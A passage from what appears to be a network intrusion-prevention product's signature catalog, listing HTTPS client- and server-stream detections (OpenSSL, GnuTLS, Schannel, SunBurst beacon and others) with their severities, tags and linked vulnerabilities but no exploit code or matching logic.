Tags: Red Hat Enterprise Linux, Any Hardware, CVE2018, Red Hat Enterprise Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1269-5242
Vulnerability: Red-Hat-librelp-Stack-Buffer-Overflow
Description:
Back to top

HTTPS_CS-Schannel-CVE-2010-3229

About this situation: Microsoft Schannel CVE-2010-3229 detected
Context: HTTPS Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-10, CVE2010, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-347-4219
Vulnerability: Microsoft-Schannel-CVE-2010-3229
Description:
Back to top

HTTPS_CS-Shared-Variables-For-Client-Stream-Context

About this situation: This fingerprint sets shared variables
Context: HTTPS Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-854-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTPS_CS-Short-Session-Id

About this situation: An abnormally short TLS session ID detected
Context: HTTPS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

HTTPS_CS-Solarwinds-SunBurst-Beacon

About this situation: Beacon traffic of the Solarwinds SunBurst intrusion
Context: HTTPS Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1317-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

HTTPS_CS-Squid-SSL-Bump-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: Squid-SSL-Bump-Denial-Of-Service
Description:
Back to top

HTTPS_CS-SSL-3.0-Client-Hello

About this situation: Detects a SSL 3.0 Client Hello message
Context: HTTPS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, OpenSSL, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-690-5211
Description:
Back to top

HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage

About this situation: Detects usage of ASN.1 bruteforcer tool against SSL
Context: HTTPS Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, MS2004, CVE2003, Any Operating System not specific, Generic HTTP server not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Asn-1-Integer-BOF-MS04-007
OpenSSL-ASN.1-Integer-Overflow-DoS
OpenSSL-ASN.1-Client-Sertificate-BOF
Description:
Back to top

HTTPS_CS-Suspected-HIDDEN-COBRA-Malicious-SSL-Traffic

About this situation: Malicious SSL traffic by HIDDEN COBRA detected.
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: HIDDEN-COBRA
Description:
Back to top

HTTPS_CS-Suspicious-Client-Request

About this situation: A suspicious TLS client request
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTPS_CS-Suspicious-Handshake-Request

About this situation: A suspicious TLS handshake
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTPS_CS-TLS-Heartbeat-Request

About this situation: A TLS Heartbeat request detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-576-5211
Vulnerability: OpenSSL-TLS-Heartbeat-Vulnerability
Description:
Back to top

HTTPS_CS-Too-Long-Session-Id

About this situation: An overly long TLS session ID detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Description:
Back to top

HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Eas_Agent-Slink_Id-SQL-Injection
Description:
Back to top

HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Mobile Security (Enterprise) detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Mobile Security, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
Vulnerability: Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
Description:
Back to top

HTTPS_SS-Anonymous-Key-Exchange

About this situation: TLS anonymous key exchange negotiated
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, GnuTLS, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1623-5242
Description:
Back to top

HTTPS_SS-Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation httpd detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Apache-Httpd-Mod_SSL-TLS-Renegotiation-Denial-Of-Service
Description:
Back to top

HTTPS_SS-Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Apple Computer Apple TV detected
Context: HTTPS Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2014, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1244-5242
Vulnerability: Apple-Products-Sslverifysignedserverkeyexchange-Security-Feature-Bypass
Description:
Back to top

HTTPS_SS-Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in AVAST Software Antivirus detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Avast Antivirus, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-727-5211
Vulnerability: Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution
Description:
Back to top

HTTPS_SS-Breakingpoint-Generated-TLS-Server-Hello-Message

About this situation: An identified TLS Server Hello message detected
Context: HTTPS Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Description:
Back to top

HTTPS_SS-Cisco-Security-Agent-Management-Center-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems Security Agent Management Center detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Security Agent Management Center, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Cisco-Security-Agent-Management-Center-Code-Execution
Description:
Back to top

HTTPS_SS-Cleartext-HTTP-After-TLS-Handshake

About this situation: Cleartext HTTP traffic after TLS handshake detected
Context: HTTPS Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, OpenSSL, GnuTLS, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-590-5211
Description:
Back to top

HTTPS_SS-GnuTLS-Certificate-Verification-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in GnuTLS GnuTLS detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: GnuTLS-Certificate-Verification-Policy-Bypass
Description:
Back to top

HTTPS_SS-GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in GnuTLS detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-867-5242
Last changed: sgpkg-ips-867-5242
Vulnerability: GnuTLS-Proxy-Certificate-Information-Extension-Memory-Corruption
Description:
Back to top

HTTPS_SS-GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GnuTLS GnuTLS detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GnuTLS, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1536-5242
Vulnerability: GnuTLS-Server-Hello-Session-Id-Heap-Buffer-Overflow
Description:
Back to top

HTTPS_SS-Insecure-Rc4-Cipher-Suite-Usage

About this situation: Usage of insecure RC4 Cipher Suite detected
Context: HTTPS Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-854-5242
Vulnerability: Insecure-Rc4-Cipher-Suite
Description:
Back to top

HTTPS_SS-Joost-Usage

About this situation: Detects Joost usage
Context: HTTPS Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Joost, Any Operating System not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-109-2032
Last changed: sgpkg-ips-695-5211
Vulnerability: HTTPS-Joost-Usage
Description:
Back to top

HTTPS_SS-Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation

About this situation: An attempt to exploit a vulnerability in Kaspersky Labs Internet Security detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Kaspersky Labs Internet Security, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: Kaspersky-Internet-Security-HTTPS-Inspection-Insecure-Certificate-Validation
Description:
Back to top

HTTPS_SS-Lets-Encrypt-Signed-Certificate

About this situation: Certificate signed by Let's Encrypt detected
Context: HTTPS Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-722-5211
Last changed: sgpkg-ips-844-5242
Vulnerability: Lets-Encrypt-Signed-Certificate
Description:
Back to top

HTTPS_SS-Microsoft-Schannel-Security-Package-Compromise

About this situation: Attempts to detect invalid Server Key Exchange server handshake messages
Context: HTTPS Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, x86, MS2007-06, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1039-5242
Vulnerability: HTTPS-Microsoft-Schannel-Security-Package-Compromise
Description:
Back to top

HTTPS_SS-Mozilla-Network-Security-Services-RSA-Signature-Forgery

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Network Security Services detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, Mozilla NSS, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: Mozilla-Network-Security-Services-RSA-Signature-Forgery
Description:
Back to top

HTTPS_SS-Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow

About this situation: Attempt to exploit a vulnerability in Mozilla family of browsers detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow
Description:
Back to top

HTTPS_SS-Mozilla-NSS-Tls-Regexp-Buffer-Overflow

About this situation: Detects TLS servers potentially exploiting a buffer overflow vulnerability
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla NSS, CVE2009, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-727-5211
Vulnerability: Mozilla-NSS-Tls-Regexp-Buffer-Overflow
Description:
Back to top

HTTPS_SS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Novell eDirectory detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Novell-eDirectory-Unchecked-Length-Denial-Of-Service
Description:
Back to top

HTTPS_SS-Null-Cipher-Usage

About this situation: TLS NULL cipher usage detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, GnuTLS, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1062-5242
Description:
Back to top

HTTPS_SS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
Description:
Back to top

HTTPS_SS-OpenSSL-Anonymous-ECDH-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: OpenSSL-Anonymous-ECDH-Denial-Of-Service
Description:
Back to top

HTTPS_SS-OpenSSL-ASN1_Type_cmp-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-639-5211
Vulnerability: OpenSSL-ASN1-Type_cmp-Denial-Of-Service
Description:
Back to top

HTTPS_SS-OpenSSL-BN_Mod_sqrt-Infinite-Loop

About this situation: A vulnerability in OpenSSL detected.
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2022, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1455-5242
Vulnerability: OpenSSL-BN_Mod_sqrt-Infinite-Loop
Description:
Back to top

HTTPS_SS-OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2017, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-854-5242
Last changed: sgpkg-ips-859-5242
Vulnerability: OpenSSL-Chacha20-poly1305-And-Rc4-md5-Integer-Underflow
Description:
Back to top

HTTPS_SS-OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: OpenSSL-CRL-Verification-X.400-Address-Handling-Type-Confusion-Vulnerability
Description:
Back to top

HTTPS_SS-OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: OpenSSL-Elliptic-Curve-Binary-Polynomial-Field-Resource-Exhaustion
Description:
Back to top

HTTPS_SS-OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-602-5211
Vulnerability: OpenSSL-Invalid-SRP-Parameters-G-And-B-Buffer-Overflow
Description:
Back to top

HTTPS_SS-OpenSSL-Large-Dh-Parameter-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: OpenSSL-Large-Dh-Parameter-Denial-Of-Service
Description:
Back to top

HTTPS_SS-OpenSSL-Null-Pointer-Dereference-CVE-2020-1971

About this situation: An attempt to exploit a vulnerability in OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Vulnerability: OpenSSL-Null-Pointer-Dereference-CVE-2020-1971
Description:
Back to top

HTTPS_SS-OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
Description:
Back to top

HTTPS_SS-OpenSSL-TLS-Record-Tampering-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: OpenSSL-TLS-Record-Tampering-Denial-Of-Service
Description:
Back to top

HTTPS_SS-OpenSSL-X509_cmp_Time-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in OpenSSL Project OpenSSL detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: OpenSSL-X509_cmp_Time-Denial-Of-Service
Description:
Back to top

HTTPS_SS-Python-Ssl-X.509-Distributionpoint-Extension-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Python detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Python, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1137-5242
Vulnerability: Python-SSL-X.509-Distributionpoint-Extension-Null-Pointer-Dereference
Description:
Back to top

HTTPS_SS-Shared-Variables-For-Server-Stream-Context

About this situation: This fingerprint sets shared variables
Context: HTTPS Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-1857-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTPS_SS-Short-Diffie-Hellman-Prime

About this situation: A short prime in Diffie-Hellamn parameters detected
Context: HTTPS Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2015, Any Operating System not specific, Potential Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-648-5211
Vulnerability: Weak-Diffie-Hellman-Parameters
Description:
Back to top

HTTPS_SS-Short-Session-Id

About this situation: An abnormally short TLS session ID detected
Context: HTTPS Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

HTTPS_SS-Squid-SSL-Bump-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Squid-SSL-Bump-Denial-Of-Service
Description:
Back to top

HTTPS_SS-Superfish-TLS-Certificate

About this situation: TLS Certificate issued by Superfish detected
Context: HTTPS Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Superfish-TLS-Certificate
Description:
Back to top

HTTPS_SS-Suspicious-Server-Certificate

About this situation: Detected a known suspicious server certificate
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-673-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTPS_SS-Suspicious-Server-Response

About this situation: Detects a suspicious TLS server response
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-605-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error

About this situation: An attempt to exploit a vulnerability in certificate validation detected
Context: HTTPS Server Stream
Severity: 7
Tags: Windows, Any Hardware, Digium Asterisk, Squid, Microsoft CryptoAPI, MS2009-10, CVE2009, CVE2015, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1179-5242
Vulnerability: Microsoft-Windows-CryptoAPI-X.509-Object-Identifiers-Spoofing-Vulnerability
Digium-Asterisk-Tls-Certificate-Common-Name-Null-Byte-Input-Validation-Error
Squid-Proxy-SSL-Bump-Certificate-Validation-Bypass
Description:
Back to top

HTTPS_SS-TLS-Certificate-Suspicious-UTCTime-Validity-End-Time

About this situation: A suspicious X.509 Certificate detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, axTLS, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1116-5242
Vulnerability: axTLS-UTC-Time-Parse-Error
Description:
Back to top

HTTPS_SS-TLS-Heartbeat-Response

About this situation: A TLS Heartbeat response detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1705-5242
Vulnerability: OpenSSL-TLS-Heartbeat-Vulnerability
Description:
Back to top

HTTPS_SS-TLS-Potential-Heartbeat-Response

About this situation: A potential TLS Heartbeat response detected
Context: HTTPS Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenSSL, CVE2014, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1705-5242
Vulnerability: OpenSSL-TLS-Heartbeat-Vulnerability
Description:
Back to top

HTTPS_SS-Too-Long-Session-Id

About this situation: An overly long TLS session ID detected
Context: HTTPS Server Stream
Severity: 7
